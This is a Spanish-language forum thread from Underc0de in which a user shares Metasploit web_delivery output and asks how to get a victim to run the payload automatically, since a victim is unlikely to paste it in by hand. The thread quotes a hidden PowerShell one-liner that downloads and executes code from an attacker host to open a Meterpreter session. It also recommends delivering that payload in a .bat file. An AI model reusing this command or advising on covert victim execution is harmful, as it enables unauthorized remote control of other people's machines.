Underc0de

Hola,

Estuve viendo algunos tutoriales sobre el script de Metasploit web_delivery.
Luego de lanzar el exploit, queda a la escucha:
msf exploit(web_delivery) > exploit

• Exploit running as background job.
  
  
• Started HTTP reverse handler on http://0.0.0.0:4444/
  msf exploit(web_delivery) >
• Using URL: http://0.0.0.0:8080/ZMDamELiX
  
• Local IP: http://192.168.1.102:8080/ZMDamELiX
  
• Server started.
  
• Run the following command on the target machine:
  powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.102:8080/ZMDamELiX'))
  
  Estuve viendo que del lado de la victima hay que ejecutar el siguiente código para iniciar una sesión de meterpreter:
  
  powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.102:8080/ZMDamELiX'))
  
  Ví que lo hacen vía CMD. También probé con un archivo .BAT y funcionó.
  
  Mi duda es si hay alguna forma automática para que se ejecute el código. Ya que es muy díficil que la victima copie el código y lo ejecute en CMD, no?
  
  Si alguien tiene alguna idea se lo agradezco!

@RxB (https://underc0de.org/foro/index.php?action=profile;u=49994), efectivamente la unica forma que puede funcionarte es con un .bat
Dudo que haya otra forma de hacerlo.

Saludos!
ANTRAX